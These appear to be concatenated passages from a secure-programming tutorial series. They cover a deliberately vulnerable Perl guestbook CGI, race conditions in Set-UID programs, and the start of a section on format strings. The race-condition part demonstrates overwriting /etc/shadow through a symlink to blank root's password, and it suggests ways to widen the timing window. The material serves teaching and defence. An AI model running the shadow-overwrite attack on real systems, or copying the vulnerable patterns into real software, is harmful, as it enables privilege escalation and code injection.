%0a \n (carriage return)
%20 space
%21 !
%22
%23 #
%26 & (ampersand)
%2f /
%3b ;
%3c <
%3e >
Tab 1 : ISO 8859-1 and character correspondance

Links


The fauly guestbook.cgi program

#!/usr/bin/perl -w

# guestbook.cgi

BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD><TITLE>Buggy Guestbook</TITLE></HEAD>\n";
&ReadParse(\%input);
my $email= $input{email};
my $texte= $input{texte};
$texte =~ s/\n/<BR>/g;

print "<BODY><A HREF=\"guestbook.html\">
       GuestBook </A><BR><form action=\"$ENV{'SCRIPT_NAME'}\">\n
      Email: <input type=texte name=email><BR>\n
      Texte:<BR>\n<textarea name=\"texte\" rows=15 cols=70>
      </textarea><BR><input type=submit value=\"Go!\">
      </form>\n";
print "</BODY>\n";
print "</HTML>";
open (FILE,">>guestbook.html") || die ("Cannot write\n");
print FILE "Email: $email<BR>\n";
print FILE "Texte: $texte<BR>\n";
print FILE "<HR>\n";
close(FILE);
exit(0);

sub ReadParse {
  my $in =shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    read(STDIN,$in_first,$ENV{'CONTENT_LENGTH'});
  }else{
    die "ERROR: unknown request method\n";
  }

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("c",hex($1))/ge;
    $val =~ s/%(..)/pack("c",hex($1))/ge;

    # Associate key and value
    $$in{$key} .= "" if (defined($$in{$key}));
    $$in{$key} .= $val;

  }

  return length($#in_second);
}


Avoiding security holes when developing an application – Part 5: race conditions


Introduction

The general principle defining race conditions is the following : a process wants to access a system resource exclusively. It checks that the resource is not already used by another process, then uses it as it pleases. The race condition occurs when another process tries to use the same resource in the time-lag between the first process checking that resource and actually taking it over. The side effects may vary. The classical case in OS theory is the deadlock of both processes. More often it leads to application malfunction or even to security holes when a process wrongfully benefits from the privileges another.

What we previously called a resource can have different aspects. Most notably the race conditions discovered and corrected in the Linux kernel itself due to competitive access to memory areas. Here, we will focus on system applications and we’ll deem that the concerned resources are filesystem nodes. This concerns not only regular files but also direct access to devices through special entry points from the /dev/ directory.

Most of the time, an attack aiming to compromise system security is done against Set-UID applications since the attacker can benefit from the privileges of the owner of the executable file. However, unlike previously discussed security holes (buffer overflow, format strings…), race conditions usually don’t allow the execution of “customized” code. Rather, they benefit from the resources of a program while it’s running. This type of attack is also aimed at “normal” utilities (not Set-UID), the cracker lying in ambush for another user, especially root, to run the concerned application and access its resources. This is also true for writing to a file (i.e, ~/.rhost in which the string “+ +” provides a direct access from any machine without password), or for reading a confidential file (sensitive commercial data, personal medical information, password file, private key…)

Unlike the security holes discussed in our previous articles, this security problem applies to every application and not just to Set-UID utilities and system servers or daemons.

First example

Let’s have a look at the behavior of a Set-UID program that needs to save data in a file belonging to the user. We could, for instance, consider the case of a mail transport software like sendmail. Let’s suppose the user can both provide a backup filename and a message to write into that file, which is plausible under some circumstances. The application must then check if the file belongs to the person who started the program. It also will check that the file is not a symlink to a system file. Let’s not forget, the program being Set-UID root, it is allowed to modify any file on the machine. Accordingly, it will compare the file’s owner to its own real UID. Let’s write something like :

1     /* ex_01.c */
2     #include <stdio.h>
3     #include <stdlib.h>
4     #include <unistd.h>
5     #include <sys/stat.h>
6     #include <sys/types.h>
7
8     int
9     main (int argc, char * argv [])
10    {
11        struct stat st;
12        FILE * fp;
13
14        if (argc != 3) {
15            fprintf (stderr, "usage : %s file message\n", argv [0]);
16            exit(EXIT_FAILURE);
17        }
18        if (stat (argv [1], & st) < 0) {
19            fprintf (stderr, "can't find %s\n", argv [1]);
20            exit(EXIT_FAILURE);
21        }
22        if (st . st_uid != getuid ()) {
23            fprintf (stderr, "not the owner of %s \n", argv [1]);
24            exit(EXIT_FAILURE);
25        }
26        if (! S_ISREG (st . st_mode)) {
27            fprintf (stderr, "%s is not a normal file\n", argv[1]);
28            exit(EXIT_FAILURE);
29        }
30
31        if ((fp = fopen (argv [1], "w")) == NULL) {
32            fprintf (stderr, "Can't open\n");
33            exit(EXIT_FAILURE);
34        }
35        fprintf (fp, "%s\n", argv [2]);
36        fclose (fp);
37        fprintf (stderr, "Write Ok\n");
38        exit(EXIT_SUCCESS);
39    }

As we explained in our first article, it would be better for a Set-UID application to temporarily drop its privileges and open the file using the real UID of the user having called it. As a matter of fact, the above situation corresponds to a daemon, providing services to every user. Always running under the root ID, it would check using the UID instead of its own real UID. Nevertheless, we’ll keep this scheme for now, even if it isn’t that realistic, since it allows us to understand the problem while easily “exploiting” the security hole.

As we can see, the program starts doing all the needed checks, i.e. that the file exists, that it belongs to the user and that it’s a normal file. Next, it actually opens the file and writes the message. That is where the security hole lies! Or, more exactly, it’s within the lapse of time between the reading of the file attributes with stat() and its opening with fopen(). This lapse of time is often extremely short but an attacker can benefit from it to change the file’s characteristics. To make our attack even easier, let’s add a line that causes the process to sleep between the two operations, thus having the time to do the job by hand. Let’s change the line 30 (previously empty) and insert :

30        sleep (20);

Now, let’s implement it; first, let’s make the application Set-UID root. Let’s make, it’s very important, a backup copy of our password file/etc/shadow :

$ cc ex_01.c -Wall -o ex_01
$ su
Password:
# cp /etc/shadow /etc/shadow.bak
# chown root.root ex_01
# chmod +s ex_01
# exit
$ ls -l ex_01
-rwsrwsr-x 1 root  root    15454 Jan 30 14:14 ex_01
$

Everything is ready for the attack. We are in a directory belonging to us. We have a Set-UID root utility (here ex_01) holding a security hole, and we feel like replacing the line concerning root from the /etc/shadow password file with a line containing an empty password.

First, we create a fic file belonging to us :

$ rm -f fic
$ touch fic

Next, we run our application in the background “to keep the lead”. We ask it to write a string into that file. It checks what it has to, sleeps for a while before really accessing the file.

$ ./ex_01 fic "root::1:99999:::::" &
[1] 4426

The content of the root line comes from the shadow(5) man page, the most important being the empty second field (no password). While the process is asleep, we have about 20 seconds to remove the fic file and replace it with a link (symbolic or physical, both work) to the /etc/shadowfile. Let’s remember, that every user can create a link to a file in a directory belonging to him even if he can’t read the content, (or in /tmp, as we’ll see a bit later). However it isn’t possible to create a copy of such a file, since it would require a full read.

$ rm -f fic
$ ln -s /etc/shadow ./fic

Then we ask the shell to bring the ex_01 process back to the foreground with the fg command, and wait till it finishes :

$ fg
./ex_01 fic "root::1:99999:::::"
Write Ok
$

Voilà ! It’s over, the /etc/shadow file only holds one line indicating root has no password. You don’t believe it ?

$ su
# whoami
root
# cat /etc/shadow
root::1:99999:::::
#

Let’s finish our experiment by putting the old password file back :

# cp /etc/shadow.bak /etc/shadow
cp: replace `/etc/shadow'? y
#

Let’s be more realistic

We succeeded in exploiting a race condition in a Set-UID root utility. Of course, this program was very “helpful” waiting for 20 seconds giving us time to modify the files behind its back. Within a real application, the race condition only applies for a very short time. How do we take advantage of that ?

Usually, the cracker relies on a brute force attack, renewing the attempts hundreds, thousands or ten thousand times, using scripts to automate the sequence. It’s possible to improve the chance of “falling” into the security hole with various tricks aiming at increasing the lapse of time between the two operations that the program wrongly considers as atomically linked. The idea is to slow down the target process to manage the delay preceding the file modification more easily. Different approaches can help us to reach our goal :

  • To reduce the priority of the attacked process as much as possible by running it with the nice -n 20 prefix;
  • To increase the system load, running various processes that do CPU time consuming loops (like while (1););
  • The kernel doesn’t allow debugging Set-UID programs, but it’s possible to force a pseudo step by step execution sendingSIGSTOPSIGCONT signal sequences thus allowing to temporarily lock the process (like with the Ctrl-Z key combination in a shell) and then restart it when needed.

The method allowing us to benefit from a security hole based in race condition is boring and repetitive, but it really is usable ! Let’s try to find the most effective solutions.

Possible improvement

The problem discussed above relies on the ability to change an object’s characteristics during the time-lapse between two operations, the whole thing being as continuous as possible. In the previous situation, the change did not concern the file itself. By the way, as a normal user it would have been quite difficult to modify, or even to read, the /etc/shadow file. As a matter of fact, the change relies on the link between the existing file node in the name tree and the file itself as a physical entity. Let’s remember most of the system commands (rm, mv, ln, etc.) act on the file name not on the file content. Even when you delete a file (using rm and the unlink() system call), the content is really deleted when the last physical link – the last reference – is removed.

The mistake made in the previous program is considering the association between the name of the file and its content as unchangeable, or at least constant, during the lapse of time between stat() and fopen() operation. Thus, the example of a physical link should suffice to verify that this association is not a permanent one at all. Let’s take an example using this type of link. In a directory belonging to us, we create a new link to a system file. Of course, the file’s owner and the access mode are kept. The ln command -f option forces the creation, even if that name already exists :

$ ln -f /etc/fstab ./myfile
$ ls -il /etc/fstab myfile
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 /etc/fstab
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 myfile
$ cat myfile
/dev/hda5   /                 ext2    defaults,mand   1 1
/dev/hda6   swap              swap    defaults        0 0
/dev/fd0    /mnt/floppy       vfat    noauto,user     0 0
/dev/hdc    /mnt/cdrom        iso9660 noauto,ro,user  0 0
/dev/hda1   /mnt/dos          vfat    noauto,user     0 0
/dev/hda7   /mnt/audio        vfat    noauto,user     0 0
/dev/hda8   /home/ccb/annexe  ext2    noauto,user     0 0
none        /dev/pts          devpts  gid=5,mode=620  0 0
none        /proc             proc    defaults        0 0
$ ln -f /etc/host.conf ./myfile
$ ls -il /etc/host.conf myfile 
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 /etc/host.conf
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 myfile
$ cat myfile
order hosts,bind
multi on
$

The /bin/ls -i option displays the inode number at the beginning of the line. We can see the same name points to two different physical inodes.

In fact, we would like the functions that check and access the file to always point to the same content and the same inode. And it’s possible ! The kernel itself automatically manages this association when it provides us with a file descriptor. When we open a file for reading, the open()system call returns an integer value, that is the descriptor, associating it with the physical file by an internal table. All the reading we’ll do next will concern this file content, no matter what happens to the name used during the file open operation.

Let’s emphasize that point : once a file has been opened, every operation on the filename, including removing it, will have no effect on the file content. As long as there is still a process holding a descriptor for a file, the file content isn’t removed from the disk, even if its name disappears from the directory where it was stored. The kernel maintains the association to the file content between the open() system call providing a file descriptor and the release of this descriptor by close() or the process ends.

So there we have our solution ! We can open the file and then check the permissions by examining the descriptor characteristics instead of the filename ones. This is done using the fstat() system call (this last working like stat()), but checking a file descriptor rather than a path. To access the content of the file using the descriptor we’ll use the fdopen() function (that works like fopen()) while relying on a descriptor rather than on a filename. Thus, the program becomes :

1    /* ex_02.c */
2    #include <fcntl.h>
3    #include <stdio.h>
4    #include <stdlib.h>
5    #include <unistd.h>
6    #include <sys/stat.h>
7    #include <sys/types.h>
8
9     int
10    main (int argc, char * argv [])
11    {
12        struct stat st;
13        int fd;
14        FILE * fp;
15
16        if (argc != 3) {
17            fprintf (stderr, "usage : %s file message\n", argv [0]);
18            exit(EXIT_FAILURE);
19        }
20        if ((fd = open (argv [1], O_WRONLY, 0)) < 0) {
21            fprintf (stderr, "Can't open %s\n", argv [1]);
22            exit(EXIT_FAILURE);
23        }
24        fstat (fd, & st);
25        if (st . st_uid != getuid ()) {
26            fprintf (stderr, "%s not owner !\n", argv [1]);
27            exit(EXIT_FAILURE);
28        }
29        if (! S_ISREG (st . st_mode)) {
30            fprintf (stderr, "%s not a normal file\n", argv[1]);
31            exit(EXIT_FAILURE);
32        }
33        if ((fp = fdopen (fd, "w")) == NULL) {
34            fprintf (stderr, "Can't open\n");
35            exit(EXIT_FAILURE);
36        }
37        fprintf (fp, "%s", argv [2]);
38        fclose (fp);
39        fprintf (stderr, "Write Ok\n");
40        exit(EXIT_SUCCESS);
41    }

This time, after line 20, no change to the filename (deleting, renaming, linking) will affect our program’s behavior; the content of the original physical file will be kept.

Guidelines

When manipulating a file it’s important to ensure the association between the internal representation and the real content stays constant. Preferably, we’ll use the following system calls to manipulate the physical file as an already open descriptor rather than their equivalents using the path to the file :

System call Use
fchdir (int fd) Goes to the directory represented by fd.
fchmod (int fd, mode_t mode) Changes the file access rights.
fchown (int fd, uid_t uid, gid_t gif) Changes the file owner.
fstat (int fd, struct stat * st) Consults the informations stored within the inode of the physical file.
ftruncate (int fd, off_t length) Truncates an existing file.
fdopen (int fd, char * mode) Initializes IO from an already open descriptor. It’s an stdio library routine, not a system call.

Then, of course, you must open the file in the wanted mode, calling open() (don’t forget the third argument when creating a new file). More onopen() later when we discuss the temporary file problem.

We must insist that it is important to check the system calls return codes. For instance, let’s mention, even if it has nothing to do with race conditions, a problem found in old /bin/login implementations because it neglected an error code check. This application, automatically provided a root access when not finding the /etc/passwd file. This behavior can seem acceptable as soon as a damaged file system repair is concerned. On the other hand, checking that it was impossible to open the file instead of checking if the file really existed, was less acceptable. Calling /bin/login after opening the maximum number of allowed descriptors allowed any user to get root access… Let’s finish with this digression insisting in how it’s important to check, not only the system call’s success or failure, but the error codes too, before taking any action about system security.

Race conditions to the file content

A program dealing with system security shouldn’t rely on the exclusive access to a file content. More exactly, it’s important to properly manage the risks of race conditions to the same file. The main danger comes from a user running multiple instances of a Set-UID rootapplication simultaneously or establishing multiple connections at once with the same daemon, hoping to create a race condition situation, during which the content of a system file could be modified in an unusual way.

To avoid a program being sensitive to this kind of situation, it’s necessary to institute an exclusive access mechanism to the file data. This is the same problem as the one found in databases when various users are allowed to simultaneously query or change the content of a file. The principle of file locking solves this problem.

When a process wants to write into a file, it asks the kernel to lock that file – or a part of it. As long as the process keeps the lock, no other process can ask to lock the same file, or at least the same part of the file. In the same way, a process asks for a lock before reading the file content to ensure no changes will be made while it holds the lock.

As a matter of fact, the system is more clever than that : the kernel distinguishes between the locks required for file reading and those for file writing. Various processes can hold a lock for reading simultaneously since no one will attempt to change the file content. However, only one process can hold a lock for writing at a given time, and no other lock can be provided at the same time, even for reading.

There are two types of locks (mostly incompatible with each other). The first one comes from BSD and relies on the flock() system call. Its first argument is the descriptor of the file you wish to access in an exclusive way, and the second one is a symbolic constant representing the operation to be done. It can have different values : LOCK_SH (lock for reading), LOCK_EX (for writing), LOCK_UN (release of the lock). The system call blocks as long as the requested operation remains impossible. However, you can do a binary OR | of the LOCK_NB constant for the call to fail instead of staying locked.

The second type of lock comes from System V, and relies on the fcntl() system call whose invocation is a bit complicated. There’s a library function called lockf() close to the system call but not as fast. fcntl()‘s first argument is the descriptor of the file to lock. The second one represents the operation to be performed : F_SETLK and F_SETLKW manage a lock, the second command stays blocks till the operation becomes possible, while the first immediately returns in case of failure. F_GETLK consults the lock state of a file (which is useless for current applications). The third argument is a pointer to a variable of struct flock type, describing the lock. The flock structure important members are the following :

Name Type Meaning
l_type int Expected action : F_RDLCK (to lock for reading), F_WRLCK (to lock for writing) and F_UNLCK (to release the lock).
l_whence int l_start Field origin (usually SEEK_SET).
l_start off_t Position of the beginning of the lock (usually 0).
l_len off_t Length of the lock, 0 to reach the end of the file.

We can see fcntl() can lock limited portions of the file, but it’s able to do much more compared to flock(). Let’s have a look at a small program asking for a lock for reading concerning files which names are given as an argument, and waiting for the user to press the Enter key before finishing (and thus releasing the locks).

1    /* ex_03.c */
2    #include <fcntl.h>
3    #include <stdio.h>
4    #include <stdlib.h>
5    #include <sys/stat.h>
6    #include <sys/types.h>
7    #include <unistd.h>
8
9    int
10   main (int argc, char * argv [])
11   {
12     int i;
13     int fd;
14     char buffer [2];
15     struct flock lock;
16
17     for (i = 1; i < argc; i ++) {
18       fd = open (argv [i], O_RDWR | O_CREAT, 0644);
19       if (fd < 0) {
20         fprintf (stderr, "Can't open %s\n", argv [i]);
21         exit(EXIT_FAILURE);
22       }
23       lock . l_type = F_WRLCK;
24       lock . l_whence = SEEK_SET;
25       lock . l_start = 0;
26       lock . l_len = 0;
27       if (fcntl (fd, F_SETLK, & lock) < 0) {
28         fprintf (stderr, "Can't lock %s\n", argv [i]);
29         exit(EXIT_FAILURE);
30       }
31     }
32     fprintf (stdout, "Press Enter to release the lock(s)\n");
33     fgets (buffer, 2, stdin);
34     exit(EXIT_SUCCESS);
35   }

We first launch this program from a first console where it waits :

$ cc -Wall ex_03.c -o ex_03
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal…

    $ ./ex_03 myfile
    Can't lock myfile
    $

Pressing Enter in the first console, we release the locks.

With this locking mechanism, you can prevent race conditions to directories and print queues, like the lpd daemon, using a flock() lock on the/var/lock/subsys/lpd file, thus allowing only one instance. You can also manage the access to a system file in a secure way like /etc/passwd, locked using fcntl() from the pam library when changing a user’s data.

However, this only protects from interferences with applications having correct behavior, that is, asking the kernel to reserve the proper access before reading or writing to an important system file. We now talk about cooperative lock, what shows the application liability towards data access. Unfortunately, a badly written program is able to replace file content, even if another process, with good behavior, has a lock for writing. Here is an example. We write a few letters into a file and lock it using the previous program :

$ echo "FIRST" > myfile
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another console, we can change the file :

    $ echo "SECOND" > myfile
    $

Back to the first console, we check the “damages” :

(Enter)
$ cat myfile
SECOND
$

To solve this problem, the Linux kernel provides the sysadmin with a locking mechanism coming from System V. Therefore you can only use it with fcntl() locks and not with flock(). The administrator can tell the kernel the fcntl() locks are strict, using a particular combination of access rights. Then, if a process locks a file for writing, another process won’t be able to write into that file (even as root). The particular combination is to use the Set-GID bit while the execution bit is removed for the group. This is obtained with the command :

$ chmod g+s-x myfile
$

However this is not enough. For a file to automatically benefit from strict cooperative locks, the mandatory attribute must be activated on the partition where it can be found. Usually, you have to change the /etc/fstab file to add the mand option in the 4th column, or typing the command :

# mount
/dev/hda5 on / type ext2 (rw)
[...]
# mount / -o remount,mand
# mount
/dev/hda5 on / type ext2 (rw,mand)
[...]
#

Now, we can check that a change from another console is impossible :

$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal :

    $ echo "THIRD" > myfile
    bash: myfile: Resource temporarily not available
    $

And back to the first console :

(Enter)
$ cat myfile
SECOND
$

The administrator and not the programmer has to decide to make strict file locks (for instance /etc/passwd, or /etc/shadow). The programmer has to control the way the data is accessed, what ensures his application to manages data coherently when reading and it is not dangerous for other processes when writing, as long as the environment is properly administrated.

Temporary files

Very often a program needs to temporarily store data in an external file. The most usual case is inserting a record in the middle of a sequential ordered file, which implies that we make a copy of the original file in a temporary file, while adding new information. Next theunlink() system call removes the original file and rename() renames the temporary file to replace the previous one.

Opening a temporary file, if not done properly, is often the starting point of race condition situations for an ill-intentioned user. Security holes based on the temporary files have been recently discovered in applications such as Apache, Linuxconf, getty_ps, wu-ftpd, rdist, gpm, inn, etc. Let’s remember a few principles to avoid this sort of trouble.

Usually, temporary file creation is done in the /tmp directory. This allows the sysadmin to know where short term data storage is done. Thus, it’s also possible to program a periodic cleaning (using cron), the use of an independent partition formated at boot time, etc. Usually, the administrator defines the location reserved for temporary files in the <paths.h> and <stdio.h> files, in the _PATH_TMP and P_tmpdir symbolic constants definition. As a matter of fact, using another default directory than /tmp is not that good, since it would imply recompiling every application, including the C library. However, let’s mention that GlibC routine behavior can be defined using the TMPDIR environment variable. Thus, the user can ask the temporary files to be stored in a directory belonging to him rather than in /tmp. This is sometimes mandatory when the partition dedicated to /tmp is too small to run applications requiring big amount of temporary storage.

The /tmp system directory is something special because of its access rights :

$ ls -ld /tmp
drwxrwxrwt 7 root  root    31744 Feb 14 09:47 /tmp
$

The Sticky-Bit represented by the letter t at the end or the 01000 octal mode, has a particular meaning when applied to a directory : only the directory owner (root ), and the owner of a file found in that directory are able to delete the file. The directory having a full write access, each user can put his files in it, being sure they are protected – at least till the next clean up managed by the sysadmin.

Nevertheless, using the temporary storage directory may cause a few problems. Let’s start with the trivial case, a Set-UID root application talking to a user. Let’s talk about a mail transport program. If this process receives a signal asking it to finish immediately, for instanceSIGTERM or SIGQUIT during a system shutdown, it can try to save on the fly the mail already written but not sent. With old versions, this was done in /tmp/dead.letter. Then, the user just had to create (since he can write into /tmp) a physical link to /etc/passwd with the name dead.letter for the mailer (running under effective UID root) to write to this file the content of the not yet finished mail (incidently containing a line “root::1:99999:::::“).

The first problem with this behavior is the foreseeable nature of the filename. You can to watch such an application only once to deduct it will use the /tmp/dead.letter file name. Therefore, the first step is to use a filename defined for the current program instance. There are various library functions able to provide us with a personal temporary filename.

Let’s suppose we have such a function providing a unique name for our temporary file. Free software being available with source code (and so for C library), the filename is however foreseeable even if it’s rather difficult. An attacker could create a symlink to the name provided by the C library. Our first reaction is to check the file exists before opening it. Naively we could write something like :

  if ((fd = open (filename, O_RDWR)) != -1) {
    fprintf (stderr, "%s already exists\n", filename);
    exit(EXIT_FAILURE);
  }
  fd = open (filename, O_RDWR | O_CREAT, 0644);
  ...

Obviously, this is a typical case of race condition, where a security hole opens following the action from a user succeeding in creating a link to /etc/passwd between the first open() and the second one. These two operations have to be done in an atomic way, without any manipulation able to take place between them. This is possible using a specific option of the open() system call. Called O_EXCL, and used in conjunction with O_CREAT, this option makes the open() fail if the file already exists, but the check of existence is atomically linked to the creation.

By the way, the ‘x‘ Gnu extension for the opening modes of the fopen() function, requires an exclusive file creation, failing if the file already exists :

  FILE * fp;

  if ((fp = fopen (filename, "r+x")) == NULL) {
    perror ("Can't create the file.");
    exit (EXIT_FAILURE);
  }

The temporary files permissions are quite important too. If you have to write confidential information into a mode 644 file (read/write for the owner, read only for the rest of the world) it can be a bit of a nuisance. The

   #include <sys/types.h>
    #include <sys/stat.h>

        mode_t umask(mode_t mask);

function allows us to determine the permissions of a file at creation time. Thus, following a umask(077) call, the file will be open in mode 600 (read/write for the owner, no rights at all for the others).

Usually, the temporary file creation is done in three steps :

  1. unique name creation (random) ;
  2. file opening using O_CREAT | O_EXCL, with the most restrictive permissions;
  3. checking the result when opening the file and reacting accordingly (either retry or quit).

How create a temporary file ? The

      #include <stdio.h>

      char *tmpnam(char *s);
      char *tempnam(const char *dir, const char *prefix);

functions return pointers to randomly created names.

The first function accepts a NULL argument, then it returns a static buffer address. Its content will change at tmpnam(NULL) next call. If the argument is an allocated string, the name is copied there, what requires a string of at least L-tmpnam bytes. Be careful with buffer overflows ! The man page informs about problems when the function is used with a NULL parameter, if _POSIX_THREADS or_POSIX_THREAD_SAFE_FUNCTIONS are defined.

The tempnam() function returns a pointer to a string. The dir directory must be “suitable” (the man page describes the right meaning of “suitable”). This function checks the file doesn’t exist before returning its name. However, once again, the man page doesn’t recommend its use, since “suitable” can have a different meaning according to the function implementations. Let’s mention that Gnome recommends its use in this way :

  char *filename;
  int fd;

  do {
    filename = tempnam (NULL, "foo");
    fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
    free (filename);
  } while (fd == -1);

The loop used here, reduces the risks but creates new ones. What would happen if the partition where you want to create the temporary file is full, or if the system already opened the maximum number of files available at once…

The

       #include <stdio.h>

       FILE *tmpfile (void);

function creates an unique filename and opens it. This file is automatically deleted at closing time.

With GlibC-2.1.3, this function uses a mechanism similar to tmpnam() to generate the filename, and opens the corresponding descriptor. The file is then deleted, but Linux really removes it when no resources at all use it, that is when the file descriptor is released, using a close()system call.

  FILE * fp_tmp;

  if ((fp_tmp = tmpfile()) == NULL) {
    fprintf (stderr, "Can't create a temporary file\n");
    exit (EXIT_FAILURE);
  }

  /* ... use of the temporary file ... */

  fclose (fp_tmp);  /* real deletion from the system */

The simplest cases don’t require filename change nor transmission to another process, but only storage and data re-reading in a temporary area. We therefore don’t need to know the name of the temporary file but only to access its content. The tmpfile() function does it.

The man page says nothing, but the Secure-Programs-HOWTO doesn’t recommend it. According to the author, the specifications don’t guarantee the file creation and he hasn’t been able to check every implementation. Despite this reserve, this function is the most efficient.

Last, the

       #include <stdlib.h>

       char *mktemp(char *template);
       int mkstemp(char *template);

functions create an unique name from a template made of a string ending with “XXXXXX“. These ‘X’s are replaced to get an unique filename.

According to versions, mktemp() replaces the first five ‘X’ with the Process ID (PID) … what makes the name rather easy to guess : only the last ‘X’ is random. Some versions allow more than six ‘X’.

mkstemp() is the recommended function in the Secure-Programs-HOWTO. Here is the method :

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

 void failure(msg) {
  fprintf(stderr, "%s\n", msg);
  exit(1);
 }

/*
 * Creates a temporary file and returns it.
 * This routine removes the filename from the filesystem thus
 * it doesn't appear anymore when listing the directory.
 */
FILE *create_tempfile(char *temp_filename_pattern)
{
  int temp_fd;
  mode_t old_mode;
  FILE *temp_file;

  /* Create file with restrictive permissions */
  old_mode = umask(077);
  temp_fd = mkstemp(temp_filename_pattern);
  (void) umask(old_mode);
  if (temp_fd == -1) {
    failure("Couldn't open temporary file");
  }
  if (!(temp_file = fdopen(temp_fd, "w+b"))) {
    failure("Couldn't create temporary file's file descriptor");
  }
  if (unlink(temp_filename_pattern) == -1) {
    failure("Couldn't unlink temporary file");
  }
  return temp_file;
}

These functions show the problems concerning abstraction and portability. That is, the standard library functions are expected to provide features (abstraction)… but the way to implement them varies according to the system (portability). For instance, the tmpfile() function opens a temporary file in different ways (some versions don’t use O_EXCL), or mkstemp() handles a variable number of ‘X’ according to implementations.

Conclusion

We flew over most of the security problems concerning race conditions to the same resource. Let’s remember you must never assume that two consecutive operations are always sequentially processed in the CPU unless the kernel manages this. If race conditions generate security holes, you must not neglect the holes caused by relying on other resources, such as variables shared between threads or memory segments shared using shmget(). Selection access mechanisms (semaphore, for example) must be used to avoid hard to discover bugs.

Links

Avoiding security holes when developing an application – Part 4: format strings


Where is the danger ?

Most security flaws come from bad configuration or laziness. This rule holds true for format strings.

It is often necessary to use null terminated strings in a program. Where inside the program is not important here. This vulnerabilty is again about writing directly to memory. The data for the attack can come from stdin, files, etc. A single instruction is enough:

printf("%s", str);However, a programmer can decide to save time and six bytes while writing only:

printf(str);With “economy” in mind, this programmer opens a potential hole in his work. He is satisfied with passing a single string as an argument, which he wanted simply to display without any change. However, this string will be parsed to look for directives of formatting (%d, %g…) . When such a format character is discovered, the corresponding argument is looked for in the stack.

We will start introducing the family of printf() functions. At least, we expect everyone knows them … but not in detail, so we will deal with the lesser known aspects of these routines. Then, we will see how to get the necessary information to exploit such a mistake. Finally, we will show how all this fits together with a single example.

Deep inside format strings

In this part, we will consider the format strings. We will start with a summary about their use and we will discover a rather little known format instruction that will reveal all its mystery.

printf() : they told me a lie !

Note for non-French residents: we have in our nice country a racing cyclist who pretended for months not to have taken dope while all the other members of his team admitted it. He claims that if he has been doped, he didn’t know it. So, a famous puppet show used the French sentence “on m’aurait menti !” which gave me the idea for this title.

Let us start with what we all learned in our programming’s handbooks: most of the input/output C functions use data formatting, which means that one has not only to provide the data for reading/writing, but also how it shold be displayed. The following program illustrates this:

/* display.c */
#include <stdio.h>

main() {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);
  printf("char : %c %c\n", i, a);
}

Running it displays:

>>gcc display.c -o display
>>./display
int  : 64 97
char : @ a

The first printf() writes the value of the integer variable i and of the character variable a as int (this is done using %d), which leads for a to display its ASCII value. On the other hand, the second printf() converts the integer variable i to the corresponding ASCII character code, that is 64.

Nothing new – everything conforms to the many functions with a prototype similar to the printf() function :

  1. one argument, in the form of a character string (const char *format) is used to specify the selected format;
  2. one or more other optional arguments, containing the variables in which values are formatted according to the indications given in the previous string.

Most of our programming lessons stop there, providing a non exhaustive list of possible formats (%g, %h, %x, the use of the dot character . to force the precision…) But, there is another one never talked about:%n. Here is what the printf()‘s man page says about it:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Here is the most important thing of this article: this argument makes it possible to write into a pointer variable , even when used in a display function !

Before continuing, let us say that this format also exists for functions from the scanf() and syslog() family.

Time to play

We are going to study the use and the behavior of this format through small programs. The first, printf1, shows a very simple use:

/* printf1.c */
1: #include <stdio.h>
2:
3: main() {
4:   char *buf = "0123456789";
5:   int n;
6:
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }

The first printf() call displays the string “0123456789” which contains 10 characters. The next %n format writes this value to the variable n:

>>gcc printf1.c -o printf1
>>./printf1
0123456789
n = 10

Let’s slightly transform our program by replacing the instruction printf() line 7 with the following one:

7:   printf("buf=%s%n\n", buf, &n);

Running this new program confirms our idea: the variable n is now 14, (10 characters from the buf string variable added to the 4 characters from the “buf=” constant string, contained in the format string itself).

So, we know the %n format counts every character that appears in the format string. Moreover, as we will demonstrate the printf2 program, it counts even further:

/* printf2.c */

#include <stdio.h>

main() {
  char buf[10];
  int n, x = 0;

  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);
}

The use of the snprintf() function is to prevent from buffer overflows. The variable n should then be 10:

>>gcc printf2.c -o printf2
>>./printf2
l = 9
n = 100

Strange ? In fact, the %n format considers the amount of characters that should have been written. This example shows that truncating due to the size specification is ignored.

What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:

/* printf3.c */

#include <stdio.h>

main() {
  char buf[5];
  int n, x = 1234;

  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);
  printf("buf = [%s] (%d)\n", buf, sizeof buf);
}

printf3 contains some differences compared to printf2:

  • the buffer size is reduced to 5 bytes
  • the precision in the format string is now set to 5;
  • the buffer content is finally displayed.

We get the following display:

>>gcc printf3.c -o printf3
>>./printf3
l = 4
n = 5
buf = [0123] (5)

The first two lines are not surprising. The last one illustrates the behavior of the printf() function :

  1. the format string is deployed, according to the commands1 it contains, which provides the string “00000“;
  2. the variables are written where and how they should, which is illustrated by the copying of x in our example. The string then looks like “01234“;
